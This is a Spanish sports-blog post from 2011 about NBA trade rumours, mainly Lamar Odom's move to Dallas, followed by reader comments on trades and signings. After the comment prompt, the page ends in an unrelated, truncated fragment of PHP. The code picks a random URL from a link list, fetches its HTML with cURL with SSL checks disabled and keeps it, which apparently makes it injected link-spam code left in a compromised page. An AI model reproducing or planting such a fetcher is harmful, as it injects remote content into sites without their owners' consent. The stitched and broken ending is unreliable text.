Repaso matutino: Odom a los Mavs

11 de December de 2011 por txusma

Café, ordenador y oleada de rumores y noticias…

Los Lakers continúan despistándonos. Tras romper las negociaciones para hacerse con Chris Paul han decidido traspasar a Lamar Odom a los Mavs a cambio de una primera ronda de 2012 y alguna otra elección de draft. La única gracia de este traspaso es que los Lakers se hacen con una trade-exception de 8,9 millones de dólares. Esta trade-exception permitiría en un futuro a la franquicia de California hacerse con un jugador sin tener que igualar salario. Pero, ¿porqué regalar al mejor 6º hombre de la liga, un jugador con gran experiencia, a uno de tus principales rivales? Está claro que los Lakers han de tener un plan, un plan prácticamente cerrado porque si no pueden quedarse con el culo al aire. La primera idea es pensar que los amarillos han virado la proa hacia Dwight Howard pero los 8,9 millones de la trade-exception no son suficientes para hacerse con el contrato tóxico de Hedo Turkoglu. Otra posible opción sería que Gasol y Bynum fueran a Orlando a cambio de Dwight Howard y Turkoglu y después los Lakers utilizaran esos 8,9 millones para rellenar la plantilla. ¿Les dejaría esto una plantilla mejor? A corto plazo parece claro que no, pero cuando se retire Kobe… O a lo mejor estamos todos haciendo cábalas y resulta que Jerry Buss ha decidido dejar de pagar tanto dinero en salarios. Vete a saber. Esperaremos próximos movimientos.

En otro orden de cosas los Magic han renovado a Jason Richardson por más de 6 millones anuales. Los Warriors han ofrecido a DeAndre Jordan 40 millones por 4 temporadas (apunta Marc: “pedir mucho más de 10 kilos anuales”). Los Knicks han fichado a Mike Bibby y podrían fichar también a JJ Barea. Así Toney Douglas podría jugar de lo que es: escolta ametralleador. Los Celtics cada vez están  más cerca de David West (coleccionan 4’s en Boston) y a parte del salario de Jermaine o’Neal parece que tendrán que enviar sus 2 elecciones del draft de este año (JaJuan Johnson y E’Twaun Moore). Y ahora los que se fijan en Chris Paul son los Clippers aunque eso les suponga perder a Eric Gordon…

 

Comenta

27 comentarios a esta entrada

  1. Denise dice:
    #1

    Puede que como dice TXusma en el articulo, los Lakers tengan un plan cerrado…pero a mi me parece patetico lo que están haciendo. Si lo unico que les hacía falta era un base medio en condiciones, con un Barea o un Ridnour le habría bastado..
    Están haciendo una reconstrucción sin venir a cuento sobre un EQUIPAZO que manteniendo el bloque, todavía les habría quedado 2 años como mínimo con muchisimas opciones de ganar un anillo. En cambio por la codicia y la tontería de fichar a un par de estrellitas están desmantelando el equipo pateticamente…y aunque acaben fichando a un par de estrellas, el proyecto sería una incertidumbre cuando tenían un proyecto que pisaba sobre seguro para los dos proximos años.

    Desde mi perspectiva Magic, y teniendo en cuenta que Howard se va a ir sí o sí…firmaba y mandaba con un lacito a Superman y Turkoglu por Gasol y Bynum…Y si quieren a Quentin Richardson y Duhon por Steve Blake y Barnes..

      Citar

  2. @pedrolongas dice:
    #2

    Mike Bibby a los knicks rechina….. madre que si rechina. Espero que Barea demuestre el nivel de play off, un tío que es incomodo y escurridizo con facilidad para anotar, puede ser el fichaje revelación.

      Citar

  3. Ru dice:
    #3

    Yo me declaro antiLaker por el trato que le han dado a Odom y Gasol(sobre todo a Gasol,para que voy a engañaros)y quiero que salga de allí cuanto antes porque estar en un equipo que no te quiere…aunque pienso que si no hay posibilidad de obtener a Howard,Gasol,a diferencia de Odom,se quedará en los Lakers sin decir una palabra más alta que otra,siendo el escudero que intente hacer bien su trabajo.Vaya manera de estropear un ciclo Mr.Buss.

    Me alegro por Odom,al menos recala en un equipo potente en el oeste y supone un gran refuerzo a cambio de nada para los campeones,aunque habrá que ver qué pasa esta temporada con Marion(los Mavs necesitan un pívot),y también está claro que a Rudy se le pone la cosa más negra.

    Ójala se de ese traspaso en los Clippers,es una pena por Eric Gordon pero viendo lo que recibían de Houston el listón está muy alto,y supongo que el SG de LAC es lo que inclinará la balanza.

    Tiene pinta de que van a ser la leche estos días.

      Citar

  4. Vader dice:
    #4

    A mi de entrada tampoco me gusta mucho Bibby, pero vendrá por el mínimo así que no afecta a otros posibles fichajes.

    Otro rumor de la gran manzana es el interes en hacerse con J.Crawford via sign&trade con los Hawks. No se que les puede ofrecer NY a los Hawks a cambio ¿T.Douglas? Por mi le pueden poner un lacito…

    A ver si se confirma lo de Barea. A mi el que me haria mucho ilusión que pudiera volver a los Knicks es Raymond Felton. Hacía una gran pareja con Stat. Con Felton los Knicks tendrian un equipazo… en fin soñar es gratis.

    Y por cierto, no quiero ser malo 😀 pero ahora si es el momento oportuno de valorar el trade de Melo del año pasado y ver en que situación estan los Knicks y en que situación los Nuggets. Mucha gente en su día critico ese traspaso y sinceramente no creo que los Knicks estuvieran mejor si no lo hubieran realizado. Y sobre los Nuggets todo lo que han hecho despues del trade es… nada… dejarse llevar…

    Saludos

      Citar

  5. HisRoyalAirness dice:
    #5

    Menudo regalito…

    Bueno, por lo que parece el año que viene se juega sin pivot, no? Mavs, Celtics.

    Estos traspasos no tienen ningún sentido

      Citar

  6. HisRoyalAirness dice:
    #6

    Y por cierto, si soy Lakers me lanzo CUAL ALIMAñA a por Chauncey. Y los Heat igual

      Citar

  7. safd dice:
    #7

    A ver, esta claro que LAL no se va a quedar asi, aun tienen opciones, y si cambian a Odom por… picks 29 y 58 del draft? xdDDD sera por algo

    Aun quedan buenos agentes libres que pueden aportar a las zonas q se les quedaran mas cojas (JJ, Chauncey, Humphries…)

    Yo creo q la cosa de Howard sera traerse a Howard y Turkoglu y luego intentar ir a por algun Humphries de la vida y algun base amnistiado o no muy caro

    Chauncey-Kobe-Turkoglu-Humphries-Howard con Fisher-Artest-Arenas y algun jugador interior (como si fuera facil eso) de mas les puede valer para sacar algun bueno resultado, aunq yo despues de la mierda q esta haciendo LAL este año me declaro Antilaker. Q les den, quitarse a sus 3 piezas de las mas importantes q los han mandao a 3 de las ultimas 4 finales y q les han dao 2 titulos. A ver si CP3 se va a LAC y les meten 4-0 en primera ronda,e so es lo q quiero yo, ala.

    Por cierto vader, sigo diciendo lo mismo q en el otro post, la opcion q mas se habla respecto a Jamaal Crawford es la de Brewer en Bulls (supongo q darian algo mas, se hablaba tb de Asik o alguna primera ronda)

      Citar

  8. @pedrolongas dice:
    #8

    De los Suns nadie habla, y es lo mejor miras la plantilla y sientes pena por Nash, yo como seguidor comprendo que la reconstrucción es necesaria, pero siento que le debemos algo a este tío, que mostró su mejor nivel en la franquicia y con un sueldo asumible.

      Citar

  9. Vader dice:
    #9

    Los Mavs he leido que quieren fichar a Dalembert por un año para tener espacio para 2012. Lo de Odom tiene pinta de ser una jugada para fichar a Howard… Y los Celtics o va a por el mismo objetivo, o piensan jugar con KG de pivot o estan por otra cosa que aún no sabemos.

    Si, Chauncey tiene toda la pinta de acabar en Miami o los Lakers. Si aún estuviera el maestro zen Billups hubiera encajado como un guante en ese equipo. Si los Lakers no hubieran hecho tanto ruido igual ahora podrian tener un Billups-Kobe-Battier-Gasol-Bynum, favoritos al anillo.

    Saludos

      Citar

  10. The wolf dice:
    #10

    @pedrolongas a los seguidores de los suns nos queda tragar todo lo posible estos 2 o 3 años y esperar a una futura reconstruccion en ese periodo…otra cosa no hay y lo de nash pues una pena que un jugador como el tenga que sufrir mas tiempo jugando con semejantes jugadores a su lado…en fin una pena

      Citar

  11. HisRoyalAirness dice:
    #11

    Nash se merece un trade a un equipo aspirante. Se lo deben.

      Citar

  12. Nacho dice:
    #12

    ¿Y en caso de que LAL se quede con Hedo, no sería normal que lo amnistiaran? ¿Sueltan el contrato de Odom y se quedan con el del turco? No me cuadra
    ¿Boston como va de espacio salarial? Porque sigue quedando el mejor 5 de los agentes libres, y pueden ir por él.

      Citar

  13. Vader dice:
    #13

    Eso, eso que suelten a Nash y se venga a los Knicks!!! Se lo deben!!! XD

    Yo tambien creo que Hedo tendria muchos números de ser el amnistiado si acaba en LA. Y ojala Marc fuera a los Celtics, con él y con Rondo tendrian una gran base para seguir siendo grandes a largo plazo.

    A ver hoy que pasa, seguro que hay más novedades.

    Saludos

      Citar

  14. J.D Mora dice:
    #14

    Jugadorazo el que se llevan los Mavs que les hacen más temibles por el montón de variantes que tienen con Dirk, Marion y Odom.

    Un saludo. Os espero en http://www.whereshowtimehappens.blogspot.com

      Citar

  15. Denise dice:
    #15

    The wolf:
    @pedrolongas a los seguidores de los suns nos queda tragar todo lo posible estos 2 o 3 años y esperar a una futura reconstruccion en ese periodo…otra cosa no hay y lo de nash pues una pena que un jugador como el tenga que sufrir mas tiempo jugando con semejantes jugadores a su lado…en fin una pena

    No creo que traspasen a Nash a no ser que este se rebele mucho, puesto que lo que le interesa a los Suns ahora mismo son expirings. Tiene toda la pinta de que esta temporada la van a dar por perdida y en 2012 reconstruir con un top 5 del draft y unos 40 millones de espacio salarial.
    De la actual plantilla, solo me quedaria para 2012 con Gortat, el recien fichado Shannon Brown y los expirings de Pietrus y Nash. Al resto intentaría empaquetarlo en cualquier sitio por mas expirings o rondas de draft.

      Citar

  16. Denise dice:
    #16

    Queria decir..para esta temporada, no para 2012

      Citar

  17. Denise dice:
    #17

    Otro posible trade que he leido entre Lakers, Hornets y Warriors.

    Chris Paul a Lakers
    Pau Gasol a Warriors
    Stephen Curry, Dorrel Wright y una ronda a Hornets.

      Citar

  18. The wolf dice:
    #18

    Parece que a david west le molan los 2 milloncitos mas que le ofrece indiana sobre la oferta de los celtics… si aparte de esto firman a O.J. Mayo la verdad es seria un gran trabajo por el momento del bueno de larry bird

      Citar

  19. The wolf dice:
    #19

    ea cerrado David west a indiana por 20 milloncejos 2 añitos

      Citar

  20. The wolf dice:
    #20

    quizas sea muy pesado pero me veo en obligacion de informar para el que lo quiera saber xD
    Houston ofrece 55M en 4 años a Marc Gasol…por lo cual segun dicen Memphis dispone de 3 dias para igualar la oferta o lo pierden…

      Citar

  21. Jose Luis dice:
    #21

    Di que sí The Wolf, tu informa de todo tío, que aquí quién más quién menos, siempre se entera de algo gracias a los comentarios 🙂

    Creo que Memphis irá al derecho de tanteo sí o sí e igualará la oferta. Si luego hacen un Sign & Trade ya es otra cosa (Scola y Martin podrían ser intercambiados).

    El traspaso a tres bandas que llevaría a Crawford a la Gran Manzana se pierde por ahora

      Citar

  22. safd dice:
    #22

    Kurt Thomas a Portland a reforzar el juego interior

      Citar

  23. Txusma dice:
    #23

    The wolf:
    quizas sea muy pesado pero me veo en obligacion de informar para el que lo quiera saber xD

    No te cortes en ningún momento. Si de algo estamos orgullosos es de los que participáis en el blog y lo enriquecéis con vuestros comentarios.

      Citar

  24. Viruete dice:
    #24

    A mí lo que me da pena es como están desmontando Dallas… Pensaba que se iría Chandler o Barea, pero los dos… En años venideros recordaremos lo que disfrutamos con este equipo y los playoffs que se marcaron.

      Citar

  25. Cocinitas dice:
    #25

    Según Hoopshype el acuerdo Clippers-Hornets se cerrará este lunes tras la aprobación de la NBA. Los Clippers envian a Kaman, Aminu,Bledsoe y la primera ronda de 2012 proveniente de Minnesota ( probablemente un top 5) a Nueva Orleans, a cambio de Chris Paul. Por tanto los Clippers formarian con Paul-Gordon-Butler-Griffin-Jordan y un banquillo con Mo Williams, Foye, Gomes y Brian Cook. Deberan fichar algun hombre alto barato más, pero a mi me parece un equipazo, este año con una temporada tan cargada de partidos junto con los Thunder los veo los maximos favoritos.

      Citar

  26. Ru dice:
    #26

    Viruete:
    A mí lo que me da pena es como están desmontando Dallas… Pensaba que se iría Chandler o Barea, pero los dos… En años venideros recordaremos lo que disfrutamos con este equipo y los playoffs que se marcaron.

    Pues el futuro de Dallas pasa por el futuro de Howard y no porque el center recale en el equipo de Cuban.De todos es sabido que Dallas quiere hacer hueco para Deron Williams en el 2012,y también es público que Deron se pensara muy mucho su renovación en los Nets si no hacen un equipo competitivo,a pesar de lo atractivo que resulta la mudanza a Brooklyn.En medio de todo aparece Howard,que estaba coqueteando con los cantos de sirena de Nets pero que en las últimas horas ese runrun se ha silenciado por la vorágine Lakers.A que quiero llegar: si Howard se va a los Nets,Deron sigue,y Dallas se queda compuesto y sin novio,y viceversa,si Howard recala en otro equipo,Deron se va a largar del proyecto Brooklyn y quien más van a apostar por él -tanto que ya lo han hecho,casi 1 año de antelación- van a ser los Mavs.

    Por parte de Indiana me congratulo porque siempre ha sido un equipo que en las últimas temporadas ha querido decir,”quiero pero no puedo” y ahí han estado en la sombra y con David West,confiando en Hibbert y en ese base Collison,si pueden hacerse con OJ Mayo,tienen pinta de que van a divertir en el este.Aún así un McRoberts más Brandon Rush se me antoja poquísimo por el Sg de Memphis.

      Citar

  27. Vader dice:
    #27

    Cocinitas:
    Según Hoopshype el acuerdo Clippers-Hornets se cerrará este lunes tras la aprobación de la NBA. Los Clippers envian a Kaman, Aminu,Bledsoe y la primera ronda de 2012 proveniente de Minnesota ( probablemente un top 5) a Nueva Orleans, a cambio de Chris Paul. Por tanto los Clippers formarian con Paul-Gordon-Butler-Griffin-Jordan y un banquillo con Mo Williams, Foye, Gomes y Brian Cook. Deberan fichar algun hombre alto barato más, pero a mi me parece un equipazo, este año con una temporada tan cargada de partidos junto con los Thunder los veo los maximos favoritos.

    Y aún te olvidas que han fichado a Caron Butler de 3… equipazo!!! Yo pensaba que para CP3 deberian soltar a Gordon o Jordan pero veo que no, bien por ellos.

    Y yo tambien me alegro de que Indiana forme un buen equipo, me caen bien y Larry me cae mejor. Supongo que si Memphis suelta a OJ Mayo por tan poco es por un tema económico. Con las renovaciones este año de Conley, Randolph y Gasol, más el contratazo de Gay ya no podian gastar el dinero que valdra Mayo.

    Saludos y me voy a leer el nuevo post!! 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>